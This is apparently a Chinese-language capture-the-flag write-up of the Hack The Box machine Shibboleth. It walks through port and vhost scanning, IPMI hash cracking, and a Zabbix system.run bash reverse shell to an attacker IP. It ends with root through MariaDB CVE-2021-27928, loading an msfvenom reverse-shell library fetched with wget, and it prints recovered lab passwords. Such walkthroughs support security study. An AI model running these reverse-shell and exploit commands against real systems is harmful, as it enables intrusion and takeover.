基本信息

端口扫描

只有80:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nmap -sV -sC 10.10.11.124
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-18 12:57 CST
Nmap scan report for 10.10.11.124
Host is up (0.070s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.09 seconds

80

ip访问跳转域名,添加hosts:

1
10.10.11.124 shibboleth.htb

页面底部, Powered by enterprise monitoring solutions based on Zabbix & Bare Metal BMC automation

vhosts

可以发现几个子域名,其中有zabbix:

1
2
3
4
gobuster vhost -u http://shibboleth.htb/ -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -k -t 50  | grep 200
Found: monitor.shibboleth.htb (Status: 200) [Size: 3686]
Found: monitoring.shibboleth.htb (Status: 200) [Size: 3686]
Found: zabbix.shibboleth.htb (Status: 200) [Size: 3686]

zabbix.shibboleth.htb

UDP端口

udp扫描可以发现623端口:

1
2
3
4
5
6
7
8
sudo nmap -sU -sV -F -v 10.10.11.124

PORT STATE SERVICE VERSION
623/udp open asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.92%I=7%D=11/18%Time=6195DFD3%P=x86_64-apple-darwin20.4.
SF:0%r(ipmi-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x00
SF:8\0\x01\x97\x04\x03\0\0\0\0\t");

搜索知道是IPMI

IMPI

就是根据资料,一步步dump hash,破解密码:

1
ilovepumkinpie1  (10.10.11.124 Administrator)

zabbix

得到的账号密码可以登录zabbix:

shell

zabbix管理hosts可以执行系统命令,Configuration —> Hosts —>Items -> create item,使用system.run key:

1
system.run[bash -c 'exec bash -i &>/dev/tcp/10.10.14.7/4444 <&1',nowait]

user flag

用户密码就是zabbix管理员密码:

1
ipmi-svc ilovepumkinpie1

提权信息

zabbix配置文件得到数据库密码:

1
2
3
4
5
6
7
8
9
10
grep -iR 'password' /etc/zabbix/ 2>/dev/null

/etc/zabbix/zabbix_server.conf.dpkg-dist:### Option: DBPassword
/etc/zabbix/zabbix_server.conf.dpkg-dist:# Database password.
/etc/zabbix/zabbix_server.conf.dpkg-dist:# Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf.dpkg-dist:# DBPassword=
/etc/zabbix/zabbix_server.conf:### Option: DBPassword
/etc/zabbix/zabbix_server.conf:# Database password.
/etc/zabbix/zabbix_server.conf:# Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf:DBPassword=bloooarskybluh

数据库版本mariadb 10.3.25,搜到相关漏洞:

1
mysql -u zabbix -p -D zabbix

CVE-2021-27928

1
2
3
4
5
6
7
8
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f elf-so -o CVE-2021-27928.so

wget http://10.10.14.7:7777/CVE-2021-27928.so

mysql -u zabbix -p -D zabbix
bloooarskybluh

SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

参考资料